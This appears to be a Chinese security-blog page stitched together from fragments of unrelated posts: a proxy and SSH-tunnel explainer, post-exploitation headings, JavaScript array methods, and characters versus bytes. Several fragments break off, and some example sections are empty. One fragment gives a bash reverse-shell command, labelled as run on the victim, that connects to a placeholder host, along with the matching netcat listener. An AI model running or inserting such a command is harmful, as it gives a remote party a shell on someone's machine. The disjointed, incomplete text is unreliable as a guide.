0x01 前言

周末去参加了一波国赛的半决赛，发现全部都是python的题，之前还以为会有人把模版改成php的呢，结果都没有。。对于python也不是很熟悉，所以回来之后学习一下。

有的时候我们可能为了访问内网而给电脑插上了网线，但是默认情况下就只能访问内网了，如果我们这个时候想要访问外网的话，就只能把网线拔了，再访问外网了，实在是太麻烦了，那么今天就介绍一个mac下同时访问内网和外网的方法给大家！

0x01 正向代理

1

LHost ---> Proxy ---> RHost

正向代理就是LHost想要访问RHost，就向Proxy发送请求，并指定要访问的对象是RHost，然后Proxy再把请求发给RHost，并将RHost返回的消息在转发给LHost，也就是说LHost对于RHost是透明的

0x01 SSH隧道

什么是SSH隧道呢？举个例子，我们都知道，SSH传输数据是加密传输的，可以有效的保证数据的安全，但是telnet是明文传输的，很不安全，尤其是在公网上，一旦监听到就会有很大的危害，所以一般公司的防火墙都会禁止外网通过telnet连接内网的计算机的。那么如果我们想在外面访问公司的计算机怎么办呢？这个时候就可以用到SSH隧道技术，可以保证数据的传输是加密的。通常我们讲的ssh隧道技术其实就是ssh端口转发。

0x01 bash

1
2
3
4
5

受害机命令
bash -i >& /dev/tcp/x.x.x.x/1234 0>&1

本机命令
nc -lvvvp 1234

0x01 获取当前组的计算机名

0x01 查看域时间

0x01 前言

今天复习了一下有关jsonp相关的攻防知识，突然发现自己对于jsonp的理解只是在书本上的那种，对于其具体的实现还是一知半解的，因此写篇文章记录一下jsonp的实现过程，会附上具体代码滴～

0x01 JS中的数组Array

在Javascript中，创建一个数组的话一般如下：

1

var color = new Array();

当然new关键字也可以省略，而pop、push、shift、unshift四种方法就是用来处理数组的。

0x02 栈方法

在Javascript中的数组提供了一种让数组的行为类似于其他数据结构的方法，具体来说就是数组表现的像栈一样。栈是一种LIFO(后进先出)的数据结构。

push()方法可以接受任意数量的参数，把它们逐个添加到数组的末尾，并返回修改后数组的长度。

pop()方法则从数组末尾移除最后一项，减少数组的length值，然后返回移除的项。

具体例子:

0x03 队列方法

栈数据结构是后进先出，而队列数据结构则是先进先出

由于push方法是向数组末端添加项的方法，因此要模拟队列只需一个从数组前端取得项的方法。
shift方法能够移除数组中的第一个项并返回该项，同时将数组的长度减一。

具体例子：

0x04 模拟逆序队列操作

在上一节说到了shift方法，该方法是移除队列的前端的一项，而unshift方法则与其相反，是向队列的前端添加一项，利用unshift和pop方法（从队列的末端拿出一项）可以实现逆序队列的操作

0x01 字符与字节

肉眼看到的一个文字或符号单元就是一个单元（包括乱码），一个字符可能对应1~n字节，1字节为8位，每一位要么是1，要么是0